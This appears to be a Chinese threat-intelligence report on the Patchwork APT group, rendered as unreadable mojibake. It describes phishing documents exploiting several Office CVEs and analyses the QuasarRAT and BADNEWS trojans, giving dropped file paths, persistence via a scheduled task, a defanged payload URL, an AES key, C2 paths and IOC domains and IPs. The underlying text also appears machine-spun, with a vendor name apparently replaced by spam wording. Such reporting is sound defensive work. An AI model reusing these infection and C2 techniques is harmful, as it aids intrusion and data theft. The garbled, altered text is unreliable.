¡°°×Ïó¡±APT×éÖ¯½üÆÚ¶¯Ì¬ÆÊÎö±¨¸æ
Ðû²¼Ê±¼ä 2018-03-31¡°°×Ïó¡±ÓÖÃû¡°Patchwork¡±£¬¡°Ä¦Ú²Ý¡±£¬ÒÉËÆÀ´×ÔÄÏÑÇij¹ú£¬×Ô2012ÄêÒÔÀ´Ò»Á¬Õë¶ÔÖйú¡¢°Í»ù˹̹µÈ¹ú¾ÙÐÐÍøÂç¹¥»÷£¬ºã¾ÃÇÔÈ¡Ä¿µÄ¹ú¼ÒµÄ¿ÆÑС¢¾üÊÂ×ÊÁÏ¡£ÓëÆäËû×éÖ¯²î±ðµÄÊÇ£¬¸Ã×éÖ¯ºÜÊÇÉÆÓÚƾ֤²î±ðµÄ¹¥»÷Ä¿µÄαÔì²î±ð°æ±¾µÄÏà¹Ø¾üÊ¡¢ÕþÖÎÐÅÏ¢£¬ÒÔ¾ÙÐÐÏÂÒ»²½µÄ¹¥»÷Éø͸¡£
2017ÄêÏ°ëÄêÒÔÀ´£¬ÎÒÃÇ·¢Ã÷Á˶àÆðÓë°×Ïó×éÖ¯Ïà¹ØµÄ×îй¥»÷ÊÂÎñ¡£¸Ã×é֯ͨ¹ýÓã²æʽ´¹ÂÚÓʼþ£¬²¢ÅäºÏÉç»á¹¤³ÌѧÊÖ¶ÎÔÚÓʼþÖз¢ËÍ´øÖøÃûÌÃÎó²îÎĵµµÄÁ´½Ó£¬ÓÕµ¼Êܺ¦È˵ã»÷ÏÂÔز¢µã»÷£¬Îó²î´¥·¢Àֳɺ󣬻áÏÂÔØQuasar£¬BADNEWSµÈ±äÖÖÔ¶¿ØľÂí¡£
¹¥»÷ÊÂÎñÆÊÎö
¹¥»÷ÊÂÎñA
µÚÒ»´Î¼¯Öй¥»÷ÊÂÎñ±¬·¢ÔÚ2017Äê11Ô·Ý×óÓÒ£¬ÎÒÃǼà¿Øµ½¸Ã×éÖ¯ÌᳫÁ˶à´ÎÓã²æÓʼþ¹¥»÷¡£Ïà¹Ø°¸ÀýÈçÏ£º
1.ʹÓÃÓʼþͶ·ÅÃûΪChina_Strategic_ChainµÄdocxÎĵµ£¬²¢ÔÚÓʼþÖÐÎĵµÄÚÈݾÙÐÐÐðÊö£¬ÒýÓÕÓû§µã»÷·¿ª¡£
2.µ±Óû§·¿ª¸ÃÎĵµºó£¬ÏÔʾÌáÐÑÔÚÊäÈëÀ¸ÊäÈëÃÜÂëKEY£¬ÔÙµã»÷×óÉÏ·½µÄͼ±ê¼´¿ÉÍê³É½âËø¡£ÏÖʵÉϸÃÊäÈëÀ¸ÎªÎı¾¿ò£¬ÇÒͼ±êΪÄÚǶµÄOLE¹¤¾ß£¬¸Ã¹¤¾ßÔÚµã»÷ºó±ã»á´¥·¢¡£
3. ͨ¹ýÌáÈ¡ÄÚǶµÄOLE¹¤¾ßÄÚÈÝ£¬·¢Ã÷ÆäÊÇÒ»¸öÃûΪStart_chain_1µÄppsxÃûÌõÄpptÎĵµ£¬µã»÷¼´¿É×Ô¶¯²¥·Åppt¡£
4.¸ÃppsxÎĵµÊ¹ÓÃÁËCVE-2017-0199µÄÎó²î£¬×Ô¶¯²¥·Åpptºó¼´¿É´¥·¢£¬²¢ÏÂÔØÔËÐÐÒ»¸ösct¾ç±¾¡£
5.sct¾ç±¾½âÃܺó»áŲÓÃPowershellÏÂÔز¢ÔËÐÐputty.exeºÍ×Ô¶¯¼ÓÔØStrategic_Chain.pdf£¬ÈÃÓû§ÎóÒÔΪÒѾ·¿ªÏà¹ØÎĵµÀֳɡ£
6.³ýÉÏÊöÊÂÎñÖ®Í⣬¸Ã×é֯ͨ¹ýÓʼþ»¹·¢ËÍÒ»·âÃûΪEntanglementµÄppsxµÄÎĵµ£¬ÎĵµÍ¬ÑùʹÓÃÁËCVE-2017-0199Îó²î£¬Ê¹ÓÃÊÖ·¨ÓëµÚÒ»Æð¹¥»÷ÊÂÎñÀàËÆ¡£
7.ÓëÆäËû¹¥»÷ÊÂÎñ²î±ðµÄÊÇ£¬Óû§·¿ª¸ÃppsxÎĵµ²¢´¥·¢Îó²îºó£¬»áͨ¹ýPowershellÏÂÔØÒ»·ÝÃûΪdecoyµÄppt²¢±»Powerpoint¼ÓÔØÆðÀ´¡£
¹¥»÷ÊÂÎñB
µÚ¶þ´Î¼¯Öй¥»÷ÊÂÎñ±¬·¢ÔÚ2018Äê3Ô£¬Í¶·ÅµÄÎĵµÖ÷ҪʹÓÃCVE-2017-8570Îó²î¾ÙÐй¥»÷£¬ÎĵµÄÚÈÝÒ²´ó¶àºÍÉç»áÕþÖÎÉúÑÄÏà¹Ø¡£
ÉÏÊö¹¥»÷ÎĵµËùʹÓõĹ¥»÷ÊÖ·¨ÍêÈ«Ïàͬ£¬¶¼°üÀ¨2¸öPackageÀàÐ͵ÄOLE¹¤¾ßºÍ1¸ö½á¹¹»¯´æ´¢ÀàÐ͵ÄOLE¹¤¾ß¡£
Ç°Á½¸öPackageÀàÐ͵ÄOLE¹¤¾ßʹÓÃPackager.dllµÄ»úÖÆ£¬ÈÏÕæ°ÑÄÚ²¿Ç¶ÈëµÄÎļþÊͷŵ½%TMP%Ŀ¼Ï¡£
×îºóÒ»¸öOLE¹¤¾ßʹÓÃCVE-2017-8570Îó²î£¬Í¨¹ýScriptlet Moniker´Ó¶ø¼ÓÔØsctÎļþÖеÄÄÚÈÝ¡£
Îó²î´¥·¢Àֳɺó£¬×îÖÕ¶¼»áÊͷŲ¢Æô¶¯Ò»¸öÃûΪqratµÄ³ÌÐò¡£
¹¥»÷ÊÂÎñC
ÔÚÏÕЩͬÆÚ£¬°×Ïó×éÖ¯»¹ÌᳫÁËÁíÍ⼸Æð¹¥»÷ÊÂÎñ£¬ÕâЩ¹¥»÷ÊÂÎñÖ÷ҪʹÓÃÁËCVE-2015-2545ºÍCVE-2017-0261Îó²îÎĵµ¾ÙÐд¹ÂÚÓʼþ¹¥»÷¡£Í¶·ÅµÄÎó²îÎļþÖÖÉæ¼°Èô¸ÉÖ÷Ì⣬ÆäÖаüÀ¨°Í»ù˹̹½¾ü×î½üµÄ¾üÊÂÔö½øÔ˶¯£¬Óë°Í»ù˹̹Ô×ÓÄÜίԱ»áÓйصÄÐÅÏ¢µÈ¡£Ïà¹ØÎó²îÎĵµ´¥·¢ºó»áÊÍ·Åа汾µÄBADNEWSϵÁÐľÂí¡£
ľÂíÆÊÎö
ÔÚÉÏÊö¼¸Æð¹¥»÷ÊÂÎñÖУ¬ÏÂÔØ£¨ÊÍ·Å£©µÄľÂíÖ÷ÒªÓÐQuasarRATºÍBADNEWSÁ½ÖÖ¡£
QuasarRATľÂí
ÔÚ¹¥»÷ÊÂÎñAºÍ¹¥»÷ÊÂÎñBÖУ¬ÏÂÔØ£¨ÊÍ·Å£©µÄľÂíΪQuasarRAT¡£
1.ÊͷŵÄľÂí°æ±¾ÐÅϢαÔì³É΢Èí»òQiho 360µÈ¡£
2.QuasarRATľÂí½ÓÄÉC#±àд£¬µ«×îз¢Ã÷µÄľÂíÍâ²ãÌí¼ÓÁËÒ»¶ÎLoader´úÂë¡£Loader´úÂëµÄÖ÷Òª¹¦Ð§ÊÇ·´¼ì²â·´É³Ï书Ч£¬²¢ÔÚ×îºó¼ÓÔØÔʼQuasarRATľÂí¡£QuasarRATľÂí½ÓÄɸßÇ¿¶È»ìÏý´¦Öóͷ£¡£
3.ÆäÖ÷Òª¹¦Ð§ÓÐÒÔϼ¸¸ö²¿·Ö£º
4.ÍøÂçϵͳÐÅÏ¢¡£
5.Ñù±¾ÔÚÍøÂçÍêÐÅÏ¢ºó£¬ »áʵÑéÅþÁ¬C&C·þÎñÆ÷¡£
6.×îºó½«ÍøÂçµ½µÄÐéÄâÇéÐΣ¬·´²¡¶¾Èí¼þ£¬Ö÷»ú£¬Óû§ÃûµÈÐÅÏ¢·¢Ë͵½C&C·þÎñÆ÷¡£
BADNEWSľÂí
ÔÚ¹¥»÷ÊÂÎñCÖУ¬ÊͷŵÄľÂíΪBADNEWSľÂí¡£
1.Ïà¹ØÎĵµ´¥·¢Îó²îºó»áÊÍ·ÅÈý¸öÎļþ£º
%PROGRAMDATA%\Microsoft\DeviceSync\VMwareCplLauncher.exe
%PROGRAMDATA%\Microsoft\DeviceSync\vmtools.dll
%PROGRAMDATA%\Microsoft\DeviceSync\MSBuild.exe
ÆäÖÐVMwareCplLauncher.exeΪ¾ßÓÐÕýµ±Êý×ÖÊðÃûµÄÎļþ£¬vmtools.dllΪ¾ÓɸĶ¯µÄdll£¬ÓÃÓÚ×îÖÕ¼ÓÔØBADNEWSµÄ×îбäÖÖMSBuild.exe¡£
2.VMwareCplLauncher.exeÔËÐк󣬻á×Ô¶¯¼ÓÔØvmtools.dll£¬vmtools.dllÖ´Ðкó»á½¨ÉèÒ»¸öÃûΪBaiduUpdateTask1µÄʹÃüÍýÏ룬¸ÃʹÃüÍýÏëÿ¸ôÒ»·ÖÖÓ»áÖ´ÐÐÒ»´ÎMSBuild.exe¡£
3. MSBuild.exeÖ´Ðк󣬻áÏÂÔØ
hxxps://raw.githubusercontent.com/husngilgit/husnahazrt/master/xml.xml
È¡³ö¡°[[¡±ºÍ¡°]]¡±ÖÐÐĵÄBase64×Ö·û´®£¬¾ÓÉÁ½´Îbase64½âÂëºÍÊý´Î½âÃܺó»ñµÃÑù±¾ÐèÒªÅþÁ¬µÄC&CµØµã¡£
4. Æ´¼¯Ö÷»úÉÏÏßÐÅÏ¢·¢Ë͵½C&C·þÎñÆ÷Ó²±àÂëµØµã¡£Ö÷»úÉÏÏßÐÅÏ¢ÃûÌÃÈçÏ£ºuuid=[UUID] #un=[µÇ¼Ãû]#cn=[ÅÌËã»úÃû]#on=[²Ù×÷ϵͳ°æ±¾] #lan=[IPµØµã]#nop=#ver=1.0¡£²¢Ê¹ÓÃAES¼ÓÃÜËã·¨£¨ÃÜÔ¿£ºDD1876848203D9E10ABCEEC07282FF37£©+base64±àÂë·¢Ë͵½//e3e7e71a0b28b5e96cc492e636722f73//4sVKAOvu3D//ABDYot0NxyG.php
5.ÔÚʹÓÃbase64±àÂëºó»¹¶Ô±àÂëºóµÄÊý¾ÝµÄÀο¿Æ«ÒÆλÖõIJåÈ롱=¡±ºÍ¡±&¡±×Ö·û¡£
6.ËѼ¯¿Í»§¶Ë·ÇÒƶ¯´ÅÅ̵ÄÃô¸ÐÎļþÁбí
£¨.xls£¬.xlsx£¬.doc£¬.docx£¬.ppt£¬.pptx£¬.pdfµÈ£©£¬²¢ÉúÑÄΪÔÝʱĿ¼ÏµÄedg499.dat¡£
7.½¨ÉèỊ̈߳¬½«¼üÅ̼ͼÐÅÏ¢£¬´°¿ÚÐÅÏ¢µÈÉúÑÄΪÔÝʱĿ¼ÏµÄTPX498.dat¡£
8.ÉÏÊöÉúÑÄΪdatÎļþµÄÊý¾Ý£¬Í¬ÑùʹÓÃÉÏÊöAES¼ÓÃÜËã·¨+base64±àÂë·¢ËÍ¡£µ«·¢Ë͵ÄÓ²±àÂëµØµã±äΪ\e3e7e71a0b28b5e96cc492e636722f73\4sVKAOvu3D\UYEfgEpXAOE.php
×ܽá
°×Ïó×éÖ¯ÏÖÔÚÖ÷ÒªÍþвĿµÄΪ°Í»ù˹̹ºÍÖйúµÄ´óÃæ»ýÄ¿µÄ£¬°üÀ¨½ÌÓý¡¢¾üÊ¡¢¿ÆÑС¢Ã½ÌåµÈÖÖÖÖÄ¿µÄ¡£ÆäÏȵ¼¹¥»÷ÊֶζàΪÓã²æʽ´¹ÂÚÓʼþ£¬·¢ËÍ´øÖøÃûÌÃÎó²îÎĵµµÄÁ´½Ó£¬²¢ÇÒÉÆÓÚαÔìÏà¹Ø¾üÊ¡¢ÕþÖÎÐÅÏ¢£¬½ÏΪϸÄå¡£
ÏÖÔÚ¸Ã×éÖ¯ÒѾÉú³¤ÎªÓнϸ߹¥»÷ÄÜÁ¦µÄС·Ö¶Ó£¬ÇÒʹÓõÄÎó²îµÄÊÖ·¨Ò²½ÏÁ¿ÐÂÓ±£¬¶ÔÉç»á¹¤³ÌѧµÄ°ÑÄóÏ൱µÄ¾«ÃÕâ´Ó½üÆÚ¶àÆð¹¥»÷ÊÂÎñÖоͿÉÒÔ¿´³ö¡£ ¹ØÓÚÀàËÆ°×ÏóµÄ¹¥»÷×éÖ¯£¬ÓÉÓÚÏòÀ´¸ü¶àÒÀÀµÀàËƵç×ÓÓʼþÕâÑùµÄ»¥ÁªÍøÈë¿Ú£¬×Åʵ±¾¿ÉÒԺܺõÄ×öµ½·ÀÓù£¬µ«Í¨¹ýÓÕµ¼ÐÔµÄÓïÑÔÈ´¿ÉÒÔ°ÑÕâЩ·ÀÓù²½·¥ÎÞЧ»¯¡£Òò´Ë£¬ÔöÇ¿¶ÔÖ°Ô±µÄÇ徲ͷÄÔ½ÌÓý£¬¿ÉÒԺܺõÄ×èÖ¹ÀàËÆÇå¾²ÊÂÎñµÄ±¬·¢¡£
Ïà¹ØIOC
rannd.org
brokings.org
crazywomen-dating.com
ifenngnews.com
209.58.185.37
mail.ifenngnews.com
chinapolicyanalysis.org
94.242.249.203
209.58.183.33
¹ØÓÚ½ð¾¦Çå¾²Ñо¿ÍŶÓ
½ð¾¦Çå¾²Ñо¿ÍŶÓÊÇÓÅ·¢¹ú¼ÊÍøÕ¾¹ÙÍø¼¯Íżì²â²úÆ·±¾²¿´ÓÊÂרҵÇå¾²ÆÊÎöµÄÊÖÒÕÐÍÍŶӣ¬Ö÷ÒªÖ°ÔðÊǶÔÏÖÓвúÆ·Éϱ¨µÄÇå¾²ÊÂÎñ¡¢Ñù±¾Êý¾Ý¾ÙÐÐÍÚ¾ò¡¢ÆÊÎö£¬²¢ÏòÓû§ÌṩרҵµÄÆÊÎö±¨¸æ¡£
¹ØÓÚVenusEyeÍþвÇ鱨ÖÐÐÄ
VenusEyeÍþвÇ鱨ÖÐÐÄ£¨www.venuseye.vip£©ÊÇÓÅ·¢¹ú¼ÊÍøÕ¾¹ÙÍøÇãÁ¦´òÔìµÄ¼¯ÍþвÇ鱨ÍøÂç¡¢ÆÊÎö¡¢´¦Öóͷ£¡¢Ðû²¼ºÍÓ¦ÓÃΪһÌåµÄÍþвÇ鱨ÔÆ·þÎñƽ̨£¬ÌṩÍþвÇ鱨Êý¾Ý¡¢ÏµÍ³¡¢ÊÖÒÕºÍרҵÄÜÁ¦µÄÊä³ö¡£